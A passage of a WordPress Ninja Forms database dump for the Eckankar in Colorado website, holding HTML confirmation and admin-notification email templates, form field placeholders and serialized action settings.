/>\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_94},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Boulder Colorado Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613167025126}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(525,22,'label','Send copy to user','label','Send copy to user'),(526,22,'objectType','Action','objectType','Action'),(527,22,'objectDomain','actions','objectDomain','actions'),(528,22,'editActive','','editActive',''),(529,22,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(530,22,'payment_gateways','','payment_gateways',''),(531,22,'payment_total','0','payment_total','0'),(532,22,'tag','','tag',''),(533,22,'email_message_plain','','email_message_plain',''),(534,22,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(535,22,'parent_id','6','parent_id','6'),(536,23,'title','','title',''),(537,23,'key','','key',''),(538,23,'type','successmessage','type','successmessage'),(539,23,'active','1','active','1'),(540,23,'created_at','2018-01-03 11:43:34','created_at','2018-01-03 11:43:34'),(541,23,'date_updated','2016-01-15','date_updated','2016-01-15'),(542,23,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(543,23,'from_name','','from_name',''),(544,23,'from_address','','from_address',''),(545,23,'to','{wp:admin_email}','to','{wp:admin_email}'),(546,23,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(547,23,'email_message','{fields_table}','email_message','{fields_table}'),(548,23,'attach_csv','0','attach_csv','0'),(549,23,'email_format','html','email_format','html'),(550,23,'reply_to','','reply_to',''),(551,23,'cc','','cc',''),(552,23,'bcc','','bcc',''),(553,23,'redirect_url','','redirect_url',''),(554,23,'label','Success Message','label','Success Message'),(555,23,'objectType','Action','objectType','Action'),(556,23,'objectDomain','actions','objectDomain','actions'),(557,23,'editActive','','editActive',''),(558,23,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(559,23,'payment_gateways','','payment_gateways',''),(560,23,'payment_total','0','payment_total','0'),(561,23,'tag','','tag',''),(562,23,'email_message_plain','','email_message_plain',''),(563,23,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(564,23,'submitter_email','','submitter_email',''),(565,23,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(566,23,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(567,23,'set_subs_to_expire','0','set_subs_to_expire','0'),(568,23,'subs_expire_time','90','subs_expire_time','90'),(569,23,'parent_id','6','parent_id','6'),(570,24,'title','','title',''),(571,24,'key','','key',''),(572,24,'type','email','type','email'),(573,24,'active','1','active','1'),(574,24,'created_at','2018-01-03 11:43:34','created_at','2018-01-03 11:43:34'),(575,24,'date_updated','2016-01-19','date_updated','2016-01-19'),(576,24,'from_name','Boulder Area Initiator and ESA Contacts','from_name','Boulder Area Initiator and ESA Contacts'),(577,24,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(578,24,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(579,24,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(580,24,'email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Boulder Initiators and ESAs</span> form submission.<br><br><br>\n </strong><br><br><br>\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Boulder Colorado Leadership Organization</em>.<br><br><br>\n <strong><br><br><br>\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_94} {field:lastname_95}</span> has submitted:</strong></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613167025126}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>','email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Boulder Initiators and ESAs</span> form submission.<br><br><br>\n </strong><br><br><br>\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Boulder Colorado Leadership Organization</em>.<br><br><br>\n <strong><br><br><br>\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_94} {field:lastname_95}</span> has submitted:</strong></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613167025126}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>'),(581,24,'attach_csv','0','attach_csv','0'),(582,24,'email_format','html','email_format','html'),(583,24,'reply_to','','reply_to',''),(584,24,'cc','','cc',''),(585,24,'bcc','','bcc',''),(586,24,'redirect_url','','redirect_url',''),(587,24,'success_msg','','success_msg',''),(588,24,'label','Admin Email','label','Admin Email'),(589,24,'objectType','Action','objectType','Action'),(590,24,'objectDomain','actions','objectDomain','actions'),(591,24,'editActive','','editActive',''),(592,24,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(593,24,'payment_gateways','','payment_gateways',''),(594,24,'payment_total','0','payment_total','0'),(595,24,'tag','','tag',''),(596,24,'email_message_plain','','email_message_plain',''),(597,24,'drawerDisabled','','drawerDisabled',''),(598,24,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(599,24,'parent_id','6','parent_id','6'),(710,29,'title','','title',''),(711,29,'key','','key',''),(712,29,'type','save','type','save'),(713,29,'active','1','active','1'),(714,29,'created_at','2018-01-03 11:42:46','created_at','2018-01-03 11:42:46'),(715,29,'label','Save Form','label','Save Form'),(716,29,'objectType','Action','objectType','Action'),(717,29,'objectDomain','actions','objectDomain','actions'),(718,29,'editActive','','editActive',''),(719,29,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(720,29,'payment_gateways','','payment_gateways',''),(721,29,'payment_total','0','payment_total','0'),(722,29,'tag','','tag',''),(723,29,'to','{wp:admin_email}','to','{wp:admin_email}'),(724,29,'reply_to','','reply_to',''),(725,29,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(726,29,'email_message','{fields_table}','email_message','{fields_table}'),(727,29,'email_message_plain','','email_message_plain',''),(728,29,'from_name','','from_name',''),(729,29,'from_address','','from_address',''),(730,29,'email_format','html','email_format','html'),(731,29,'cc','','cc',''),(732,29,'bcc','','bcc',''),(733,29,'redirect_url','','redirect_url',''),(734,29,'parent_id','8','parent_id','8'),(735,30,'title','','title',''),(736,30,'key','','key',''),(737,30,'type','email','type','email'),(738,30,'active','1','active','1'),(739,30,'created_at','2018-01-03 11:42:46','created_at','2018-01-03 11:42:46'),(740,30,'date_updated','2016-01-15','date_updated','2016-01-15'),(741,30,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(742,30,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(743,30,'to','{field:email_23}','to','{field:email_23}'),(744,30,'email_subject','Central Colorado Leadership Communications','email_subject','Central Colorado Leadership Communications'),(745,30,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_21},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Central Colorado Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_21}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_22}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_23}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_24}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_25}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_28}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_29}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<p>If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org</p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_21},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Central Colorado Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_21}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_22}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_23}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_24}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_25}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_28}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_29}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<p>If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org</p><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br 